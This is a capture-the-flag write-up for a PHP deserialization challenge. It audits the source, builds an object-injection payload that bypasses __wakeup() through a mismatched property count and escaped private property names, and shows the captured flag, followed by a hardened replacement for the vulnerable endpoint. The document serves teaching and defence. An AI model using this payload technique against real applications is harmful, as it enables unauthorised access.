1. PHP - [极客大挑战 2019] - [Portal -> BUUCTF]
Step 1: Start the challenge environment and open the link. The page hints that a backup file exists. A directory scan turns up www.zip; download it and it contains a number of files.
Step 2: Code audit:
index.php
<?php
include 'class.php'; // includes class.php
$select = $_GET['select']; // reads the select parameter from the GET query string
$res = unserialize(@$select); // unserializes the user-controlled select parameter and stores the result in $res
?>
class.php
<?php
include 'flag.php'; // includes flag.php, which defines $flag
error_reporting(0); // disable error reporting
class Name{ // class Name
    private $username = 'nonono'; // private property $username
    private $password = 'yesyes'; // private property $password
    public function __construct($username,$password){ // public constructor, called automatically when the class is instantiated
        $this->username = $username; // initialise $username
        $this->password = $password; // initialise $password
    }
    function __wakeup(){ // magic method __wakeup(): called automatically when an instance of this class is unserialized
        $this->username = 'guest'; // resets $username to 'guest'
    }
    function __destruct(){ // destructor __destruct(): called automatically just before an instance of this class is destroyed
        if ($this->password != 100) { // loose comparison: is password not equal to the integer 100?
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') { // strict comparison: is username exactly the string 'admin'?
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>
Step 3: Approach
Pass in a serialized instance of this class whose username property is === 'admin' and whose password property is 100, while bypassing the __wakeup() magic method (which would otherwise reset username to 'guest' during unserialization). The destructor then prints the flag.
Step 4: Write the code that generates the payload
<?php
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$chen = new Name('admin',100);
$chen = serialize($chen);
echo $chen."<br />";
// Output (the null byte before and after "Name" in each private property name is invisible when rendered):
// O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
$chen = str_replace(chr(00),'\00',$chen); # replace the invisible null bytes with the printable escape \00 so the payload can be typed into a URL
echo $chen."<br />";
// O:4:"Name":2:{s:14:"\00Name\00username";s:5:"admin";s:14:"\00Name\00password";i:100;}
$chen = str_replace('s:14:','S:14:',$chen); # an uppercase S tells unserialize() to decode \xx hex escapes, so \00 is read back as a real null byte
echo $chen."<br />";
// O:4:"Name":2:{S:14:"\00Name\00username";s:5:"admin";S:14:"\00Name\00password";i:100;}
$chen = str_replace('O:4:"Name":2:','O:4:"Name":3:',$chen); # declare 3 properties while only 2 follow: on older PHP versions this mismatch skips __wakeup()
echo $chen."<br />";
// O:4:"Name":3:{S:14:"\00Name\00username";s:5:"admin";S:14:"\00Name\00password";i:100;}
Payload:
?select=O:4:"Name":3:{S:14:"\00Name\00username";s:5:"admin";S:14:"\00Name\00password";i:100;}
Step 5: Submit the payload and obtain the flag
(screenshot omitted) flag{38ab7815-1f86-4317-8468-e38a6de4e117}
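The root cause in index.php is that a raw GET parameter reaches unserialize(), so any class with __wakeup() or __destruct() becomes reachable. The following is an added example, not code from the writeup or from the challenge, showing the hardened shape such an endpoint should have: objects are never instantiated during deserialization, nested objects are rejected, and a data-only format (JSON) is preferred. The function names and the constructed sample inputs are this example's own.

```php
<?php
// Added example, not part of the original writeup: a hardened replacement for
// the challenge's index.php. Function and variable names are this example's own.

declare(strict_types=1);

// Recursively report whether a decoded value contains any object at all.
function containsObject($value): bool
{
    if (is_object($value)) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (containsObject($item)) {
                return true;
            }
        }
    }
    return false;
}

// Deserialize untrusted data without ever instantiating a class.
// allowed_classes => false turns every O:/C: token into a __PHP_Incomplete_Class
// placeholder, which has no magic methods, so Name::__wakeup() and
// Name::__destruct() can never run on attacker-supplied input.
// Returns null for malformed input or for input that carries objects.
function safeUnserialize(string $data)
{
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== serialize(false)) {
        return null; // parse error, e.g. a tampered property count
    }
    if (containsObject($value)) {
        return null; // refuse objects, nested ones included
    }
    return $value;
}

// Constructed inputs for a local demonstration (no server involved).
$samples = [
    // the writeup's payload: declared count 3, two properties present
    'O:4:"Name":3:{S:14:"\00Name\00username";s:5:"admin";S:14:"\00Name\00password";i:100;}',
    // the same object with a correct property count
    'O:4:"Name":2:{S:14:"\00Name\00username";s:5:"admin";S:14:"\00Name\00password";i:100;}',
    // an object hidden inside an array
    'a:1:{i:0;O:4:"Name":0:{}}',
    // plain data, which is all such a parameter should ever carry
    'a:1:{s:4:"name";s:5:"guest";}',
];

foreach ($samples as $data) {
    var_dump(safeUnserialize($data));
}

// Better still, avoid PHP serialization for untrusted input altogether and use
// JSON, which cannot express classes or trigger magic methods.
$decoded = json_decode('{"name":"guest"}', true, 512, JSON_THROW_ON_ERROR);
var_dump($decoded['name']);
```

By design, the three object-bearing samples are rejected by safeUnserialize() and only the plain array is returned, so neither the writeup's __wakeup() bypass nor the __destruct() flag read is reachable regardless of PHP version. The property-count trick relied on by the payload is also a reminder that relying on __wakeup() alone as a safety net is fragile; keeping attacker input out of unserialize() entirely is the durable fix.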
This article was collected automatically from the internet or published with the author's permission; the views expressed do not represent our position. For takedown requests, contact us. Source: https://blog.csdn.net/qq_45555226/article/details/110003000